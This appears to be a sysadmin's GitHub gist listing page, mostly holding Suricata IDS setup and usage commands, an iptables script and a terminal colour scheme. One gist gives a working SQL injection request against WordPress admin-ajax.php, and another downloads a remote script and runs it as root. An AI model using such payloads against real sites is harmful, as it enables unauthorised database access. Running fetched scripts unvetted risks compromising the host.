Erick Z Zobber

🎯

Focusing

SysAdmin ☻

2 followers · 4 following

Universidad Nacional Abierta y a Distancia
Colombia
08:24 (UTC -05:00)

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

Zobber / termitescheme

Created July 28, 2019 05:39 — forked from jmcblane/termitescheme

	*foreground: #ececec
	*background: #1a1a1a

	!colors
	! black
	*color0: #1c1c1c
	*color8: #505050

	! red
	*color1: #cd5c5c

Zobber / wp-admin

Created March 26, 2020 01:09

POST /wp-admin/admin-ajax.php?action=rss&type=video&vid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,md5(2349819),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23

Zobber / anti-ddos.sh

Created March 26, 2020 13:04

	#!/bin/sh

	# For debugging use iptables -v.
	IPTABLES="/sbin/iptables"
	IP6TABLES="/sbin/ip6tables"
	MODPROBE="/sbin/modprobe"
	RMMOD="/sbin/rmmod"
	ARP="/usr/sbin/arp"

	# Defaults for rate limiting

Zobber / suricada_ids_cpu

Created March 27, 2020 15:17

sudo cpudist-bpfcc -L -p `pidof suricata` 600 1

Zobber / suricada_ids_ssh_vpn

Created March 27, 2020 15:18

stdbuf -oL suricata -knone -c /etc/suricata/suricata_no_dataset.yaml -l ./  -r /dev/stdin -l ./win7_su_log -vv

Zobber / openvpn-install.sh

Created March 28, 2020 18:39

	#!/bin/bash
	wget https://git.io/vpn -O openvpn-install.sh
	sudo bash openvpn-install.sh

Zobber / suricata_install

Last active April 1, 2020 17:16

	sudo apt -y install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf
	automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev
	libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config
	sudo apt-get install libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev libnet1-dev libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev zlib1g-dev pkg-config rustc cargo

	## For IPTABLES

	apt-get install libnetfilter-queue-dev libnetfilter-queue1 \
	libnetfilter-log-dev libnetfilter-log1 \
	libnfnetlink-dev libnfnetlink0

Zobber / suricata_rules_manage

Created April 1, 2020 17:30

	## General rules
	sudo suricata-update

	## OISF host
	sudo suricata-update update-sources
	sudo suricata-update list-sources

	## To enable ‘oisf/trafficid’, enter
	sudo suricata-update enable-source oisf/trafficid
	sudo suricata-update

Zobber / suricata_usage

Created April 1, 2020 17:40

	########################################################################
	https://kifarunix.com/install-and-setup-suricata-on-ubuntu-18-04/
	https://hackertarget.com/install-suricata-ubuntu-5-minutes/
	https://fwhibbit.es/suricata-ids-jugando-con-las-reglas
	########################################################################

	## execute
	suricata -c /etc/suricata/suricata.yaml -i <network interface>

	## Scan a PCAP file

Zobber / suricada

Created April 5, 2020 02:52

cat eve.json | jq -c 'select((.http or .tls) and .alert) | [.flow_id,.http.hostname,.http.http_method,.alert.signature,.src_ip,.dest_ip]'

OlderNewer